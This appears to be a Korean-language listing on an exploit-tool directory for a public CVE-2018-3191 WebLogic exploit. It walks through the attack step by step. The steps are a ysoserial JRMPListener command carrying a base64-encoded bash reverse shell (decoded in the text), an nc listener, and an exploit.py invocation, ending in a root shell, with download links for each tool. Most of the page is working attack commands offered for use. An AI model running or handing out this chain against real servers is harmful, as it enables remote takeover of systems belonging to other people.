Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-3191 — CVE-2018-3191 리버스 셸 | Kitploit
도구/GitHubGitHub/libraggbond/cve-2018-3191
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHublibraggbond/cve-2018-3191

CVE-2018-3191

CVE-2018-3191 리버스 셸

저장소 보기
63297년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-3191

CVE-2018-3191 리버스 셸 로컬 IP:172.16.38.1 Weblogic:172.16.38.174:7001 1、 로컬 실행 java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

그런 다음 nc -lvv 7777 실행

(1) 여기서 bash 명령어는 Runtime.getRuntime().exec() 실행 중 특수 기호가 이스케이프되는 것을 방지하기 위해 base64 인코딩/디코딩을 수행한 것이며, 평문은 bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 입니다. (2) 이 작업은 로컬에서 JRMPListener를 수신하여 공격받는 Weblogic의 요청을 받고 지정된 bash 리버스 명령을 실행합니다. (3) nc가 7777 포트를 수신하여 Weblogic 호스트의 bash 리버스 연결을 기다립니다. 2、 실행 python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222,취약점을 이용하여 Weblogic이 원격 RMI 서비스에 접속하게 하고 bash 리버스 명령을 실행합니다.

3、 nc가 수신 대기하는 포트에서 리버스 bash를 받았으며, root 권한입니다.

공격에 필요한 도구: ysoserial-master.jar //역직렬화 활용 도구https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 payload 생성 도구 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py //Weblogic T3 프로토콜 전송 도구, CVE-2018-3191 payload 통합

도구 다운로드